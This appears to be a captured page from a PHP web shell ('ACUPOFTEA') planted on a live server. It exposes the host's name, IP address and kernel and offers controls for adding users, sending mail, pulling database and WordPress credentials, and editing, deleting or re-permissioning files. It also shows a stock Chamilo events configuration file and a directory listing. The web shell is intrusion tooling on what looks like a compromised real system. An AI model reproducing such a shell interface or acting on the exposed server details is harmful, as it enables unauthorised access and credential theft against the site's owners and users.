System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
chamilo
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
events.conf.php
<?php /* For licensing terms, see /license.txt */ /** * Events' configuration * @deprecated to be removed in 2.x * Used to configure each event and to link them to functions the event'll fire. * The flow is like the following : * 1. somewhere in the application an event is fired * 2. that event is intercepted by the switch EventsDispatcher * 3. that switch will go all over the "actions" in the event_config initialized beneath us according to the event * 4. that switch will see if the function actually exists (if not, we get dont do anything) * 5. then it will see if a filter for that function exists (if it does, the filter is executed) * 6. if the filter says it's ok, the function linked to the event is executed * 7. and that function will actually call the truly interesting function with the good require_once */ global $event_config; $event_config = array( 'portal_homepage_edited' => array( // key for "user registration" event 'actions' => array( // we link this event to a bunch of functions that will be triggered when the event is fired 'event_send_mail' // don't forget to actually write this function in the events.lib.php file ), 'self_sent' => false, // this key states that we can't add user to this event through the admin panel 'name_lang_var' => get_lang('PortalHomepageEdited'), 'desc_lang_var' => get_lang('PortalHomepageEdited'), 'available_keyvars' => array (// keys used for the mail template 'url' => 'portal', 'sitename' => 'sitename', 'firstname' => 'firstname', 'lastname' => 'lastname', 'username' => 'username', 'usermail' => 'usermail', 'password' => 'password', 'user_lang' => 'language', 'admin_name' => 'administrator_name', 'admin_surname' => 'administrator_surname', 'admin_phone' => 'administrator_phone', 'admin_email' => 'administrator_email', ) ), 'user_registration' => array( // key for "user registration" event 'actions' => array( // we link this event to a bunch of functions that will be triggered when the event is fired 'event_send_mail' // don't forget to actually write this function in the events.lib.php file ), 'self_sent' => true, // this key states that we can't add user to this event through the admin panel 'name_lang_var' => get_lang('UserRegistrationTitle'), 'desc_lang_var' => get_lang('UserRegistrationComment'), 'available_keyvars' => array (// keys used for the mail template 'url' => 'portal', 'sitename' => 'sitename', 'firstname' => 'firstname', 'lastname' => 'lastname', 'username' => 'username', 'usermail' => 'usermail', 'password' => 'password', 'user_lang' => 'language', 'admin_name' => 'administrator_name', 'admin_surname' => 'administrator_surname', 'admin_phone' => 'administrator_phone', 'admin_email' => 'administrator_email', ) ), ); @include 'events.conf.local.php';
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-07-01 09:42:02
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-07-01 09:42:02
php53
DIR
-
drwxr-xr-x
2025-07-01 09:42:02
php56
DIR
-
drwxr-xr-x
2025-07-01 09:42:02
php71
DIR
-
drwxr-xr-x
2025-07-01 09:42:02
php81
DIR
-
drwxr-xr-x
2025-07-01 09:42:02
php82
DIR
-
drwxr-xr-x
2025-07-01 09:42:02
add_course.conf.php
text/x-php
265 B
-rw-r--r--
2021-12-23 06:54:36
auth.conf.php
text/x-php
6.37 KB
-rw-r--r--
2024-10-22 07:51:56
clone.php
text/x-php
5.85 KB
-rw-r--r--
2025-07-01 02:59:18
configuration.php
text/x-php
135.92 KB
-rw-r--r--
2025-07-01 01:16:28
course_info.conf.php
text/x-php
176 B
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
4.28 KB
-rw-r--r--
2025-07-01 02:59:18
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
events.conf.php
text/x-php
3.23 KB
-rw-r--r--
2021-12-23 06:54:36
fileindex.php
text/plain
516 B
-rw-r--r--
2023-01-25 12:55:00
import.php
text/x-php
3.45 KB
-rw-r--r--
2025-07-01 02:59:18
info.xml
text/html
3.18 KB
-rw-r--r--
2025-07-01 01:16:28
install.js
text/plain
924 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
6.64 KB
-rw-r--r--
2025-07-01 02:59:18
install.xml
text/html
4.24 KB
-rw-r--r--
2021-12-23 06:54:36
mail.conf.php
text/x-php
3.42 KB
-rw-r--r--
2024-10-22 07:51:56
md5
text/plain
1.93 KB
-rw-r--r--
2025-07-01 02:59:18
notes.txt
text/plain
1.22 KB
-rw-r--r--
2024-01-24 05:57:10
profile.conf.php
text/x-php
1.31 KB
-rw-r--r--
2023-01-25 12:55:00
upgrade.php
text/x-php
5.84 KB
-rw-r--r--
2025-07-01 02:59:18
upgrade.xml
text/plain
419 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com